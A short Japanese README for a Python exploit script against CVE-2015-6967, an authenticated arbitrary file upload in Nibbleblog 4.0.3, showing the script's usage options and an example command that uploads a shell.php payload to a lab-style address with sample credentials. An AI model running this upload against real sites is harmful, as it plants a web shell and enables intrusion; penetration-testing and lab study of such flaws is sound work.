
Python製のCVE-2015-6967エクスプロイトスクリプト。Nibbleblog 4.0.3における認証済み任意ファイルアップロードを可能にし、カスタムペイロードに対応しています。
Nibbleblog 4.0.3 - 任意ファイルアップロード (CVE-2015-6967)
requestsusage: exploit.py [-h] --url URL --username USERNAME --password PASSWORD --payload PAYLOAD
optional arguments:
-h, --help show this help message and exit
--url URL, -l URL
--username USERNAME, -u USERNAME
--password PASSWORD, -p PASSWORD
--payload PAYLOAD, -x PAYLOAD
例:
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php